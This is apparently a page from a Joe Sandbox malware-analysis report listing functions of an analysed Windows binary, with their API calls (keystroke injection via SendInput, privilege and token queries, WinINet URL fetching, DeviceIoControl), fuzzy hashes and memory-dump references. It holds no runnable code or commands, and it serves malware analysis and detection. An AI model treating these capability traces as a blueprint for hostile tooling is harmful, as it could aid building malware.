Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c6135a987b2ebe4c33a6c45b7739d9e5565e0e56cb8984f52bb607a4e64920c5
Instruction ID: ece5d8763ffaf533bbc830610a302dbfead134ec794359e102224eb14bced9ac
Opcode Fuzzy Hash: c6135a987b2ebe4c33a6c45b7739d9e5565e0e56cb8984f52bb607a4e64920c5
Instruction Fuzzy Hash: 0F412839600A10DFCB11EF15C495A59BBF2EF59320B188489E949AB3A2CB70FD42DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F58E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F58F03

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 7065bf463bf42f6a5a1b8d2b8574f1c2b8f07867383b453e41daac47f76c431b
Instruction ID: 3f71528105b7df733ddefd517c93fe8166a81302ac74478dfcbed5542aeebd39
Opcode Fuzzy Hash: 7065bf463bf42f6a5a1b8d2b8574f1c2b8f07867383b453e41daac47f76c431b
Instruction Fuzzy Hash: 7631E535A10208FFEF209A54CC45BA937E6EB0A3A2F244502FF11F61A1CF71D95AFA51

Uniqueness

Uniqueness Score: -1.00%

Function 00F5B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00F5B1D2
GetWindowRect.USER32 ref: 00F5B248
PtInRect.USER32(?,?,00F5C6BC), ref: 00F5B258
MessageBeep.USER32(00000000), ref: 00F5B2C9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 6d21e71754f2733ab369582738b4ce14f860f5f933735d3342ed1d27f1e125a2
Instruction ID: 4b729049301553fd9e4e02027c6616b8947b711f120cba0c1a9b3596dd994594
Opcode Fuzzy Hash: 6d21e71754f2733ab369582738b4ce14f860f5f933735d3342ed1d27f1e125a2
Instruction Fuzzy Hash: 67418130A04219DFCF12DF58C884B9D7BF5FF49312F2440A5EA189B255D730A845EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F312D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F31326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00F31342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F313A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F313FA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 95658684b10cfde20486daac8d59a7e81f21c1be8d6973ce53f6088beb5b9a52
Instruction ID: e67b6de7c4ccb74122ccedec775ca142ba71b1c5cf980ea1b90f4b8a92a08c4e
Opcode Fuzzy Hash: 95658684b10cfde20486daac8d59a7e81f21c1be8d6973ce53f6088beb5b9a52
Instruction Fuzzy Hash: A7313530E44208AEFF348A258C05BFEBBA9BB45330F08821AE491526D1D7788D55BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F31410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,749173F0,?,00008000), ref: 00F31465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00F31481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00F314E0
SendInput.USER32(00000001,?,0000001C,749173F0,?,00008000), ref: 00F31532

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 273717e6617cbafefdfd86f7fe26f4e3af7c2d8b80556eef3788177d1d2d1a52
Instruction ID: 5608c7fa11eefea14701c5549bfaa15d3123a8a79651fbe49694168245d0b252
Opcode Fuzzy Hash: 273717e6617cbafefdfd86f7fe26f4e3af7c2d8b80556eef3788177d1d2d1a52
Instruction Fuzzy Hash: 54310530D402185AEF34CB65DC04BBABBA5BB86330F18431AE491521D1D7798955BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F063F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F0642B
__isleadbyte_l.LIBCMT ref: 00F06459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F06487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F064BD

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 09c28184d4a8956895845670971841c60b22dc69f975b39feb87266dc7365259
Instruction ID: 4fa7e3c7f467d1865d2f4cf1caa2bd65243ce122931a7397f1ea600c8171f6f6
Opcode Fuzzy Hash: 09c28184d4a8956895845670971841c60b22dc69f975b39feb87266dc7365259
Instruction Fuzzy Hash: CD31AE35A0025AAFDB21CF65CC44BAA7BA9BF41320F154069E864DB1D1DB31E860FB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F5552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F5553F

Part of subcall function 00F33B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F33B4E
Part of subcall function 00F33B34: GetCurrentThreadId.KERNEL32 ref: 00F33B55
Part of subcall function 00F33B34: AttachThreadInput.USER32(00000000,?,00F355C0), ref: 00F33B5C

GetCaretPos.USER32(?), ref: 00F55550
ClientToScreen.USER32(00000000,?), ref: 00F5558B
GetForegroundWindow.USER32 ref: 00F55591

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a6df5f890412acfedc244bc979775749e174567ab311c630c6e76ddc8357253e
Instruction ID: 10a6dc6736fd3adb8f464bfab3a9c76a2f0a4d17956780e0531951a4c8c17d36
Opcode Fuzzy Hash: a6df5f890412acfedc244bc979775749e174567ab311c630c6e76ddc8357253e
Instruction Fuzzy Hash: 85312DB1900108AFDB00EFA5DC85DEFB7F9EF98314F10406AE915E7241EA75AE458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

GetCursorPos.USER32(?,?,?,?,?,?,?,?,00F0BCEC,?,?,?,?,?), ref: 00F5CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F0BCEC,?,?,?,?,?), ref: 00F5CB8F
GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,00F0BCEC,?,?,?,?,?), ref: 00F5CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F0BCEC,?,?,?), ref: 00F5CC16

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: b64d3468138c74eb2e630f2b7af20a345f297c829c0f265ec6bb9765406e8eb6
Instruction ID: 411fe2b6fdb5bc2006b27a2dbfbc6add7a69322e4c247979f3ce0c9081963ec5
Opcode Fuzzy Hash: b64d3468138c74eb2e630f2b7af20a345f297c829c0f265ec6bb9765406e8eb6
Instruction Fuzzy Hash: 9831C135A00218BFCB159F54C859EBA7BB5EB89321F144099FE0697261C7315D51FFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00EF0BE2

Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37E51,?,?,00000000), ref: 00EE4041
Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37E51,?,?,00000000,?,?), ref: 00EE4065

_fprintf.LIBCMT ref: 00EF0C19
OutputDebugStringW.KERNEL32(?), ref: 00F2694C

Part of subcall function 00EF4CCA: _flsall.LIBCMT ref: 00EF4CE3

__setmode.LIBCMT ref: 00EF0C4E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 3e77577fd853b6d1147712f2695c1049ad0765557fa167697c912eb05640b286
Instruction ID: cfe92822bf0354e605bf2a0c39eb789948b0be705605009d48b35791e2ec1160
Opcode Fuzzy Hash: 3e77577fd853b6d1147712f2695c1049ad0765557fa167697c912eb05640b286
Instruction Fuzzy Hash: B11127B1A0420C6ADB08B7B4AC469FFBBA9DF80320F141156F304B72C2DF75599257A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F29274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28D3F
Part of subcall function 00F28D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D49
Part of subcall function 00F28D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D58
Part of subcall function 00F28D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D5F
Part of subcall function 00F28D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F292C1
_memcmp.LIBCMT ref: 00F292E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F2931A
HeapFree.KERNEL32(00000000), ref: 00F29321

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: c3f73ed51a4a1e123db46274df46d2a5e3d96e5c4b34be368b5da1266825a88b
Instruction ID: 594bbb569bbf928b2a37cf9ceac77130f808138d9ecee3985fdc27c3244ad536
Opcode Fuzzy Hash: c3f73ed51a4a1e123db46274df46d2a5e3d96e5c4b34be368b5da1266825a88b
Instruction Fuzzy Hash: C2219A32E44119EFDF10DFA4D945BEEB7B8EF44311F144099E894AB291D7B0AE05EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F41E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F41E6F

Part of subcall function 00F41EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F41F18
Part of subcall function 00F41EF9: InternetCloseHandle.WININET(00000000), ref: 00F41FB5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b43bc322c83f895966080799b34f0aaa89702af4349f083324b3b439458829e1
Instruction ID: fad6a680e6f4bd60f0a318e509b3f20183f6b5f777b15cfe1ad50d6dc0df5bf4
Opcode Fuzzy Hash: b43bc322c83f895966080799b34f0aaa89702af4349f083324b3b439458829e1
Instruction Fuzzy Hash: 74215E3A600609BFDB119F60CC01FBBBBAAFB84710F10451AFE5596650DBB1B851BB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00F563BD
SetWindowLongW.USER32 ref: 00F563D7
SetWindowLongW.USER32 ref: 00F563E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F563F3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 5773cbdd7babed93be18f0fa5df6903f36872505403e8d2a933ee3262065df7a
Instruction ID: 8f8645d02faa3ccb9adaab72afefc057b4dd3add9050820207ab96f8bbee0654
Opcode Fuzzy Hash: 5773cbdd7babed93be18f0fa5df6903f36872505403e8d2a933ee3262065df7a
Instruction Fuzzy Hash: C811D032305514AFD704AB24DC45FBA77A9EF85320F18411AFA26DB3E2DBA4AD01DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00F2E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F2E46F,?,?,?,00F2F262,00000000,000000EF,00000119,?,?), ref: 00F2F867
Part of subcall function 00F2F858: lstrcpyW.KERNEL32 ref: 00F2F88D
Part of subcall function 00F2F858: lstrcmpiW.KERNEL32(00000000,?,00F2E46F,?,?,?,00F2F262,00000000,000000EF,00000119,?,?), ref: 00F2F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F2E488
lstrcpyW.KERNEL32 ref: 00F2E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00F2F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F2E4E2

Strings

cdecl, xrefs: 00F2E4D9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: ec66ec0bfed661533b8ff600e142d8d36b1d2d24633f0aad72ef974d93fc27f6
Instruction ID: 22a6cca48094ae8d96804c01e69bc9111ac9626ad8f355f157a9c5fdabe581fd
Opcode Fuzzy Hash: ec66ec0bfed661533b8ff600e142d8d36b1d2d24633f0aad72ef974d93fc27f6
Instruction Fuzzy Hash: AE11D03A200359AFDB25AF24EC45D7A77B8FF45360B50402AF80ACB2A0EB71D940E791

Uniqueness

Uniqueness Score: -1.00%

Function 00F05312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F05331

Part of subcall function 00EF593C: __FF_MSGBANNER.LIBCMT ref: 00EF5953
Part of subcall function 00EF593C: __NMSG_WRITE.LIBCMT ref: 00EF595A
Part of subcall function 00EF593C: RtlAllocateHeap.NTDLL(01270000,00000000,00000001,?,00000004,?,?,00EF1003,?), ref: 00EF597F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 3e884a63e8ff9af10612405dd7f7328f22b309c9dadecfa3d0689f4fb024d431
Instruction ID: afaf7653e6def00e0926c9a65edd7ca7ccf4580eb1ed822f3b6406e72afa2f26
Opcode Fuzzy Hash: 3e884a63e8ff9af10612405dd7f7328f22b309c9dadecfa3d0689f4fb024d431
Instruction Fuzzy Hash: F311AB32905A1DAFCB252F74AC0577B37D99F14BB1B204916F658AA1D0DEF18940BF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE5B58

Part of subcall function 00EE56F8: _memset.LIBCMT ref: 00EE5787
Part of subcall function 00EE56F8: _wcscpy.LIBCMT ref: 00EE57DB
Part of subcall function 00EE56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE57EB

KillTimer.USER32(?,00000001,?,?), ref: 00EE5BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE5BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F20D7C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8cb1b1531c47f6addc26a620527abf049c5209a5dac2823fa502fbb29e294f0e
Instruction ID: ba4181fb336571a51730bb47b3c42120d26ea578b2389654903c4ef9a9cb629e
Opcode Fuzzy Hash: 8cb1b1531c47f6addc26a620527abf049c5209a5dac2823fa502fbb29e294f0e
Instruction Fuzzy Hash: FC210A729057989FE7728B249C95BEBBBEC9F01308F04048DE69A66142CB742984DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F34365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F34385
_memset.LIBCMT ref: 00F343A6
DeviceIoControl.KERNEL32 ref: 00F343F8
CloseHandle.KERNEL32(00000000), ref: 00F34401

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 0ba250dfa1a17103d8a26c92f2eb64c20149631a0c9224fc214f9f694f8faf42
Instruction ID: 1123d5138938baf41e24e55664f2bfbe37f45c7e7387aa696c33506a79a29439
Opcode Fuzzy Hash: 0ba250dfa1a17103d8a26c92f2eb64c20149631a0c9224fc214f9f694f8faf42
Instruction Fuzzy Hash: A511E771D0122CBAD7309BA5AC4DFABBB7CEF45730F10459AF908E7280D6745E809BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F46A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37E51,?,?,00000000), ref: 00EE4041
Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37E51,?,?,00000000,?,?), ref: 00EE4065

gethostbyname.WSOCK32(?,?,?), ref: 00F46A84
WSAGetLastError.WSOCK32(00000000), ref: 00F46A8F
_memmove.LIBCMT ref: 00F46ABC
inet_ntoa.WSOCK32(?), ref: 00F46AC7

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
